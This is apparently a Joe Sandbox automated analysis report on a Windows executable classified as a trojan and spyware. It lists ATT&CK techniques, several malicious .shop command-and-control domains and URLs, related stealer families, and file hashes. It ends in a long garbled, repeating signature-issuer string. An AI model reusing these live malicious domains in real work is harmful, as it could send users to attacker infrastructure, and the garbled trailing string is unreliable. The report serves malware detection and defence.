              Deobfuscate/Decode Files or Information              		LSASS Memory11
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol31
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              shortsvelventysjo.shop16%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              tolerateilusidjukl.shop0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/api80%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/api=0%Avira URL Cloudsafe
              shortsvelventysjo.shop0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/h0%Avira URL Cloudsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              shatterbreathepsw.shop0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/api100%Avira URL Cloudmalware
              shortsvelventysjo.shop16%VirustotalBrowse
              demonstationfukewko.shop0%Avira URL Cloudsafe
              productivelookewr.shop0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/h9%VirustotalBrowse
              https://shortsvelventysjo.shop/80%Avira URL Cloudsafe
              tolerateilusidjukl.shop14%VirustotalBrowse
              demonstationfukewko.shop18%VirustotalBrowse
              shatterbreathepsw.shop17%VirustotalBrowse
              https://shortsvelventysjo.shop/90%Avira URL Cloudsafe
              productivelookewr.shop16%VirustotalBrowse
              https://shortsvelventysjo.shop/E0%Avira URL Cloudsafe
              alcojoldwograpciw.shop0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/api17%VirustotalBrowse
              https://shortsvelventysjo.shop/apiS0%Avira URL Cloudsafe
              incredibleextedwj.shop0%Avira URL Cloudsafe
              liabilitynighstjsko.shop0%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/#0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/apiS11%VirustotalBrowse
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/PDJ0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/apiakijgnj0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/#1%VirustotalBrowse
              https://shortsvelventysjo.shop/)DC0%Avira URL Cloudsafe
              https://shortsvelventysjo.shop/1%VirustotalBrowse
              alcojoldwograpciw.shop17%VirustotalBrowse
              https://shortsvelventysjo.shop/apinn0%Avira URL Cloudsafe
              incredibleextedwj.shop14%VirustotalBrowse
              liabilitynighstjsko.shop17%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              shortsvelventysjo.shop
              		104.21.16.225
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              shortsvelventysjo.shoptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              tolerateilusidjukl.shoptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              shatterbreathepsw.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://shortsvelventysjo.shop/apitrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              demonstationfukewko.shoptrue
              • 18%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              productivelookewr.shoptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              alcojoldwograpciw.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              incredibleextedwj.shoptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              liabilitynighstjsko.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://shortsvelventysjo.shop/api8file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://shortsvelventysjo.shop/hfile.exe, 00000000.00000002.2108071195.0000000001A0D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106566914.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.sectigo.com0file.exefalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://shortsvelventysjo.shop/api=file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://x1.i.lencr.org/0file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://shortsvelventysjo.shop/8file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://shortsvelventysjo.shop/9file.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://shortsvelventysjo.shop/Efile.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://shortsvelventysjo.shop/apiSfile.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 11%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://sectigo.com/CPS0file.exefalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://shortsvelventysjo.shop/#file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000003.2058469300.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2055535840.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2057887848.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058091669.0000000001A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://shortsvelventysjo.shop/file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106837095.0000000001996000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tfile.exefalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://shortsvelventysjo.shop/PDJfile.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://shortsvelventysjo.shop/apiakijgnjfile.exe, 00000000.00000003.2106837095.000000000198F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#file.exefalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://shortsvelventysjo.shop/)DCfile.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2058469300.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2055535840.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2057887848.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058091669.0000000001A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://shortsvelventysjo.shop/apinnfile.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.16.225
                                              		shortsvelventysjo.shopUnited States
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1431744
                                              Start date and time:2024-04-25 17:38:08 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 3m 40s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:2
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 31
                                              • Number of non-executed functions: 188
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Stop behavior analysis, all processes terminated

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              17:38:59API Interceptor7x Sleep call for process: file.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.16.225https://t.sidekickopen10.com/Ctc/2P+23284/d5d6-w04/JkM2-6qcW6N1vHY6lZ3nKW8wJljK7cvX5TW4-QBtM2J7hhlW2XhyKc75t6-JW82tj6d5jw9tzW94xXFv3tMhffW7WqP2M7bCGBqW52T22n117gCvN4c0HVbJ_mc8W80J-Sg5SsD--N6bSj02q_FdtW6BmYbL37lgXnW65WK4m7Bdq8GW66HBVb2dCCwLW64jK1J6lP2PkV1WmXg13XsrYW1F-9t_3mTDJNN166WjShRlGXW555ffF681-YrMZRpB_lHXCYW57gWSl6dwgM2W51Q9vV4W-1dvW3cZ2w04Tm1Rrf4bvVVP04Get hashmaliciousUnknownBrowse

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttp://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                • 104.26.0.231
                                                https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238Get hashmaliciousUnknownBrowse
                                                • 172.67.222.163
                                                https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                • 104.21.17.5
                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                • 104.26.5.15
                                                https://r20.rs6.net/tn.jsp?f=001mdupJ4qBb-Nd2_ylzx8HBttlQ9opTAsCLDNaIzR_kjOMUNmpNcZJwTrf1-JKcQms1CJ9Uho976bwGC08_tX5C5noMjVDoDyLOXoK3aopxxStOM8t6wvTBKWgVo18etJYQ_eeHjJ4R2lwkep1pKOUg8VLdGfphtuo&c=&ch=/Er8BdK9PMSuOgr2lskWkeZAKVKx339#?ZnJhbmtfZHJhcGVyQGFvLnVzY291cnRzLmdvdg==Get hashmaliciousHTMLPhisherBrowse
                                                • 104.17.2.184
                                                https://bushelman-my.sharepoint.com/:b:/p/lance/ESXtc6Laa05KpaC4W3rpMEMBfLSUU1GZhgfhBL8opRqFHg?e=Wrw3leGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                • 104.17.2.184
                                                https://uploaddeimagens.com.br/images/001/894/856/original/Logo_Email_Advisia.png?1550069603Get hashmaliciousUnknownBrowse
                                                • 104.16.80.73
                                                https://app.robly.com/sites/1550c67c312457e2bb58457f78fda912/f774d7ddfffc8f1d429cd55a95adr852dGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                • 104.17.2.184
                                                [EXTERNAL] New file received.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.24.14
                                                https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                                • 104.21.17.5

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                • 104.21.16.225
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.16.225
                                                Iu4csQ2rwX.msiGet hashmaliciousAsyncRATBrowse
                                                • 104.21.16.225
                                                o7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.16.225
                                                SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 104.21.16.225
                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                • 104.21.16.225
                                                https://56hytuti5.weebly.com/Get hashmaliciousUnknownBrowse
                                                • 104.21.16.225
                                                udVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 104.21.16.225
                                                samradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                                                • 104.21.16.225
                                                Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 104.21.16.225

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.880436867068405
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:6'173'144 bytes
                                                MD5:93115e1730da5003243c419c7d841ca3
                                                SHA1:f78e99d234fada2af2a61ed5b3095aeb1be16247
                                                SHA256:6501a306d8930d9e9504ab23bc393eaef11b2a9ec1098037d07842431ec35c92
                                                SHA512:baff4dbee22aefa0851014ae41a6d1c5131d7e61cb8a5ccbb5ecf999540646cf7921f5dc362154ba80cd4baa005c4e5ba93bf6e4bdbefc2c6937532c3a0cbeb9
                                                SSDEEP:98304:upOa0Ff/qYoZHrNWlJeV8GjaVpMBMWKlcqLzpuAVB+fk0IuSI/j9zLAS3XiUlIHa:Wp0Ff/qYoZHYlJMWWKlJLzpjjPub1USv
                                                TLSH:2856238B2ECB80DAD5C111B4E317B6F723F269F95D864C359DC479C6A0B1E36603D21A
                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....L)f.....................R......j.............@...................................^...@........................................

                                                File Icon

                                                Icon Hash:1bfbfbf37b19d8bb

                                                Static PE Info

                                                General

                                                Entrypoint:0xc1d06a
                                                Entrypoint Section:.vmp
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x66294CCE [Wed Apr 24 18:17:50 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:a2dba7c4a8d827543ea3d1099ab91444

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:C=WORLD, S=WORLD, L=\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\xd5?\xcd\xd3zA\xc9/$F\xf3\xae\xb3?M\xa3\u2022\u203a\u02dc\x